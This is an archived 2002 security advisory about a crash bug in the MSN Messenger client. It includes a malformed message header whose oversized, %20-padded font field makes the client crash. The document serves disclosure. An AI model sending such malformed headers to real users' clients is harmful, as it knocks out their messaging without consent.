Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5333.htm

MSN Messenger crash due to misformated message header



7th May 2002 [SBWID-5333]
COMMAND

	MSN Messenger crash due to misformated message header

SYSTEMS AFFECTED

	??

PROBLEM

	[underdoc@pandora.be] said :
	

	The Msn Messenger client works by sending a header with  every  message.
	So every time a user wants to send a message,  it  generates  a  header,
	containing information about the font, the  color  of  the  message  and
	some other information.
	

	A normal header look something like this:
	

	<start>

	MIME-Version: 1.0

	Content-Type: text/plain; charset=UTF-8

	X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; 

	PF=22

	

	hey friend, how are you?

	<end>

	

	When we replace the font field with something very  large.  Creating  an
	overflaw the header will look like this:
	

	<start>

	MIME-Version: 1.0

	Content-Type: text/plain; charset=UTF-8

	X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20

	%20%20%20%20%20%20%20%20%20%20%20%20

	%20%20%20%20%20%20%20%20%20%20%20%20

	%20New%20%20%20%20%20%20%20%20%20%20

	%20%20%20%20%20%20%20%20%20%20%20%20

	Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; 

	PF=22

	

	hey friend, how are you?

	<end>

	

	As a result the Msn Messenger client will crash
	

	This flaw only crashes the Msn Messenger  from  Microsoft.  Trillian  is
	not affected.

SOLUTION

	None yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH